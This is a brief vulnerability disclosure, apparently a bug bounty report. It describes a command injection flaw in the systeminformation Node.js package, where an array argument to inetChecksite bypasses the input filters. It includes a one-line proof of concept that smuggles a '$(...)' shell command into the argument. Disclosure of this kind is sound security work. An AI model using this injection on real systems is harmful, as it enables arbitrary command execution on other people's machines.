Command Injection in sebhildebrandt/systeminformation
Feb 12th 2021
systeminformation is vulnerable to
Command Injection vulnerability.
It is possible to send an array containing OS commands, which bypass the filters.
Proof of Concept
const si = require('systeminformation'); const command = "$(<OS Command>)"; si.inetChecksite([command]);
Edit the constant
commandwith a desired OS command.